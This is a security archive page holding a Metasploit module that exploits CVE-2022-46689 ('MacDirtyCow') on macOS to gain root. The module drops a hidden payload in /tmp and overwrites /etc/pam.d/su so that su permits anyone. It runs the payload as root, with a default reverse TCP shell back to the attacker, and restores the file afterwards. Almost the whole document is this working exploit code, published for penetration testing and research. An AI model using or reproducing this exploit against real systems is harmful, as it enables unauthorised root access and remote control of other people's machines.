what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

macOS Dirty Cow Arbitrary File Write Local Privilege Escalation
Posted Feb 3, 2023
Authored by timwr, Ian Beer, Zhuowei Zhang | Site metasploit.com

Dirty Cow arbitrary file write local privilege escalation exploit for macOS.

tags | exploit, arbitrary, local
advisories | CVE-2022-46689
SHA-256 | 2c735a5dbdfd48004da2df38d8a8eed0528ab5199ff9cd6dbf70e890c7786c0c

macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Post::File
include Msf::Post::OSX::Priv
include Msf::Post::OSX::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(
update_info(
info,
'Name' => 'macOS Dirty Cow Arbitrary File Write Local Privilege Escalation',
'Description' => %q{
An app may be able to execute arbitrary code with kernel privileges
},
'License' => MSF_LICENSE,
'Author' => [
'Ian Beer', # discovery
'Zhuowei Zhang', # proof of concept
'timwr' # metasploit integration
],
'References' => [
['CVE', '2022-46689'],
['URL', 'https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.61.2/tests/vm/vm_unaligned_copy_switch_race.c'],
['URL', 'https://github.com/zhuowei/MacDirtyCowDemo'],
],
'Platform' => 'osx',
'Arch' => ARCH_X64,
'SessionTypes' => ['shell', 'meterpreter'],
'DefaultTarget' => 0,
'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/shell_reverse_tcp' },
'Targets' => [
[ 'Mac OS X x64 (Native Payload)', {} ],
],
'DisclosureDate' => '2022-12-17',
'Notes' => {
'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES],
'Reliability' => [REPEATABLE_SESSION],
'Stability' => [CRASH_SAFE]
}
)
)
register_advanced_options [
OptString.new('TargetFile', [ true, 'The pam.d file to overwrite', '/etc/pam.d/su' ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]
end

def check
version = Rex::Version.new(get_system_version)
if version > Rex::Version.new('13.0.1')
CheckCode::Safe
elsif version < Rex::Version.new('13.0') && version > Rex::Version.new('12.6.1')
CheckCode::Safe
elsif version < Rex::Version.new('10.15')
CheckCode::Safe
else
CheckCode::Appears
end
end

def exploit
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end

unless writable? datastore['WritableDir']
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
end

payload_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"
binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
upload_and_chmodx payload_file, binary_payload
register_file_for_cleanup payload_file

target_file = datastore['TargetFile']
current_content = read_file(target_file)
backup_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"
unless write_file(backup_file, current_content)
fail_with Failure::BadConfig, "#{backup_file} is not writable"
end
register_file_for_cleanup backup_file

replace_content = current_content.sub('rootok', 'permit')

replace_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"
unless write_file(replace_file, replace_content)
fail_with Failure::BadConfig, "#{replace_file} is not writable"
end
register_file_for_cleanup replace_file

exploit_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"
exploit_exe = exploit_data 'CVE-2022-46689', 'exploit'
upload_and_chmodx exploit_file, exploit_exe
register_file_for_cleanup exploit_file

exploit_cmd = "#{exploit_file} #{target_file} #{replace_file}"
print_status("Executing exploit '#{exploit_cmd}'")
result = cmd_exec(exploit_cmd)
print_status("Exploit result:\n#{result}")

su_cmd = "echo '#{payload_file} & disown' | su"
print_status("Running cmd:\n#{su_cmd}")
result = cmd_exec(su_cmd)
unless result.blank?
print_status("Command output:\n#{result}")
end

exploit_cmd = "#{exploit_file} #{target_file} #{backup_file}"
print_status("Executing exploit (restoring) '#{exploit_cmd}'")
result = cmd_exec(exploit_cmd)
print_status("Exploit result:\n#{result}")
end

end
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close